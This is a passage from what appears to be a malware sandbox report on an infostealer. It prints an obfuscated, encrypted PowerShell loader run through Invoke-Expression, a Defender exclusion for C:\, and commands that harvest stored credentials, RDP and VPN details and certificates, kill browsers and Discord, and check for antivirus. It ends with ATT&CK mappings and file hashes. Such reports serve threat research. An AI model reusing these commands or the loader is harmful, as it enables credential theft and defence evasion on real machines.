3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"7⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
PID:11760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:12920
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416870101\44cdc87f9e.exe"C:\Users\Admin\AppData\Local\Temp\10416870101\44cdc87f9e.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7432
-
-
C:\Users\Admin\AppData\Local\Temp\10416890101\captcha.exe"C:\Users\Admin\AppData\Local\Temp\10416890101\captcha.exe"5⤵
- Executes dropped EXE
- Enumerates connected drives
PID:12216 -
C:\Windows\system32\cmd.exe"cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_718592000.txt\""6⤵
- NTFS ADS
PID:1832
-
-
C:\Windows\system32\net.exe"net" statistics workstation6⤵PID:6452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 statistics workstation7⤵PID:10444
-
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list6⤵PID:10208
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list6⤵PID:10036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "6⤵
- Command and Scripting Interpreter: PowerShell
PID:8664 -
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list7⤵PID:8100
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:8348
-
-
C:\Windows\system32\certutil.exe"certutil" -store My6⤵PID:8184
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:2620
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FO CSV /NH6⤵
- Enumerates processes with tasklist
PID:6828
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My6⤵PID:7284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"6⤵
- Command and Scripting Interpreter: PowerShell
PID:6320
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:6368
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:7664
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:8320
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:8608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "6⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
PID:8772
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:9172
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list6⤵PID:9480
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.746⤵PID:9612
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:9688
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:10972
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe6⤵
- Kills process with taskkill
PID:10996
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe6⤵
- Kills process with taskkill
PID:4348
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:11416
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe6⤵PID:11532
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe6⤵
- Kills process with taskkill
PID:11636
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:11808
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe6⤵
- Kills process with taskkill
PID:11916
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe6⤵PID:12708
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:12724
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:12940
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe6⤵
- Kills process with taskkill
PID:12948
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe6⤵
- Kills process with taskkill
PID:13132
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:6772
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe6⤵
- Kills process with taskkill
PID:6652
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe6⤵PID:7460
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
PID:7000
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe6⤵
- Kills process with taskkill
PID:4408
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe6⤵
- Kills process with taskkill
PID:4484
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe6⤵PID:1108
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe6⤵PID:2264
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM Discord.exe6⤵
- Kills process with taskkill
PID:2184
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe6⤵PID:5636
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordCanary.exe6⤵
- Kills process with taskkill
PID:5276
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe6⤵PID:5520
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordPTB.exe6⤵
- Kills process with taskkill
PID:428
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe6⤵PID:6332
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordDevelopment.exe6⤵
- Kills process with taskkill
PID:1728
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe6⤵
- Kills process with taskkill
PID:5140
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe6⤵PID:7848
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe6⤵
- Kills process with taskkill
PID:964
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe6⤵
- Kills process with taskkill
PID:4528
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe6⤵PID:7676
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe6⤵PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416900101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10416900101\7IIl2eE.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:8508 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat6⤵
- System Location Discovery: System Language Discovery
PID:9112 -
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:11284
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"7⤵PID:11308
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:11644
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"7⤵PID:11668
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183777⤵PID:11900
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab7⤵PID:11920
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation7⤵PID:12268
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com7⤵PID:12332
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N7⤵PID:12440
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N7⤵PID:12560
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵PID:12604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416910101\XOPPRUc.exe"C:\Users\Admin\AppData\Local\Temp\10416910101\XOPPRUc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:10760 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:10780
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
PID:10796
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416920101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10416920101\h8NlU62.exe"5⤵PID:12292
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:12360
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:12376
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:12400
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416930101\f01c408210.exe"C:\Users\Admin\AppData\Local\Temp\10416930101\f01c408210.exe"5⤵PID:7340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2h3853.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2h3853.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"1⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"2⤵PID:4784
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"1⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"2⤵PID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3320
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4340
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:6276
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:2320
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:7556
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 10912 -ip 109121⤵PID:11392
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{6de22b4c-aeec-4d5a-ae91-5a30501945f4}\42bdb713-0053-4a10-9bb0-c040d5ebd6b9.cmd"11⤵PID:12944
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
8Windows Service
8Event Triggered Execution
1Netsh Helper DLL
1Modify Authentication Process
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
8Windows Service
8Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Ignore Process Interrupts
1Impair Defenses
8Disable or Modify System Firewall
1Disable or Modify Tools
5Safe Mode Boot
1Modify Authentication Process
1Modify Registry
8Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
390KB
MD57c924dd4d20055c80007791130e2d03f
SHA1072f004ddcc8ddf12aba64e09d7ee0ce3030973e
SHA256406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6
SHA512ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806
-
Filesize
649B
MD5fe3127d1d22bd0bd2e2e482ca2448a92
SHA18bfecc41ab00d6584013b879b1a7e0363a7949ec
SHA256203c89d2e32e035ba8cf888b452c13d347a4cc87a083af4b817384dec87b6c5d
SHA512a12eb671ebd6873faa2b4a78d78b6f9a26b69cebcb7435fac4ffc47eb27dd76922833cf282dbb447f45237e07beac3cddd26f99b385a3c3b362426c48a52a7a6
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\CURRENT
Filesize16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\MANIFEST-000001
Filesize41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
79KB
MD57bbe2ecdaf39b733f0366b03b79ce7ce
SHA167f6381dcb1d32f2f84a2660289b0ead5bf9fe86
SHA25622bcffeb77c8030de42975932c8bc57c94f979f9f164a8d22dd73ce3d9893893
SHA512e3b30b8271f7c765b9450ffffdc3dde9a68dc8a19ceda5a295a5cca351dcdeb1405a4e216ea103ed7b7b6e4c4c2def423dc03e52722eab58a8fbcd9c4a11473c
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
107KB
MD52b66d93c82a06797cdfd9df96a09e74a
SHA15f7eb526ee8a0c519b5d86c845fea8afd15b0c28
SHA256d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954
SHA51295e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5
-
Filesize
1KB
MD5cf1dc69da6507e8feb9c9668850a5a4e
SHA159e3f855b34f953497e18779effc697f0a50b34b
SHA256c33bcfe7f9d620d6fbf741484fc00902b8a192c1f084adc31b1421f3803780a9
SHA512d951e96d36bc3ab3b7df44b7dfe7c7eb05673f9dfbd4add703ad8d1abfc78b20504f8ef73a49b3270db98a9e10dc895c69f77d7b27f61255ffa31875f88c2498
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize
14KB
MD5e62c0f66d398704309404aba11bfdc8e
SHA115a38f978819563b69a28dff567e8c98bc3813d3
SHA256e3b9e1a0f35d092d19938a65b68f7da3d512f4826abeeb9abe8c80c3fb2397b7
SHA5125c30ab27d8a1b842508c0955ad1aecd067a49b4aa84e5c64c285c17a57e3688a115034087ed38838055d0f5c5072fc28b139030f06447ed31ef8de066deb8af4
-
Filesize
30KB
MD531c707180c35d2dd0aadf8996e5719ea
SHA14c037f11ba2c8683f7be4e98b5308a71fec30b69
SHA256af2e7e9d41296c405e8b8e35f4d67731872172d4ff64c32736ad83e0efc2d92a
SHA51228cd910f1d407e2a6ec423d13f4200ca181f15822365d9189c192e53b56397e72c3c41de2a01eb6a08f9af874669201e9e2cccb464af1f228e977d5f6b4e4098
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b31ac5d5-f3c9-4706-bd69-fa1295cda083\index-dir\the-real-index
Filesize1KB
MD5ffbfd3cb4ce84a36aadd16731b472649
SHA173249d41633f6b972769e2b9575ce327cd1b14a8
SHA256ac35fafaf6e2d998a6a3394d45cbf0548ef62d03b152967b4fcaaf56fe99581c
SHA512b43a8781acb01580a73cd95cd126b74d14513ab9f2bd04c2d2d39fe340b2ef3cac97dffa001e2d99febe91fd0e7823f35da985e38769b2b4e24b5f15c6c84b85
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b31ac5d5-f3c9-4706-bd69-fa1295cda083\index-dir\the-real-index~RFe582268.TMP
Filesize1KB
MD5cc57c940edbe620e231efabedd48ff8b
SHA1263328cf65a44ff4b66fca590a582bac808c770f
SHA256933d052c44c9912017294f80736fa04858f5fa06692adabff7ef726e0ac98c98
SHA51237f2eda25c3c244fbdf459f13a7b06e1cf5c27f6f542aef8fac6848926b2d2331a24af12d90d28728cd13557dc8877fccefd23d817170f2e545db43feab040a7
-
Filesize
40KB
MD5a8bf4c81e3a25a5eb6a300d5fa07ee5b
SHA1a72917ac425f043e8f9e2559cb24bfac596a7f72
SHA25628e199ba4c469f54c92301fae1e042fdd7bce3da83f964dea0021e52a75d32be
SHA51243c158d1ba39da6bc58e32798953862a8bedd05fbaf0b20088182d6bc9c792d5ce683bdba22907fd2806487d24e8a2276f06005930c1965c99fda830f8b726d2
-
Filesize
41KB
MD5643c11b8e89b9d8534b3ca1799cfc950
SHA1d021702de3f24f485bfffa12f78f0ae88c5c5f16
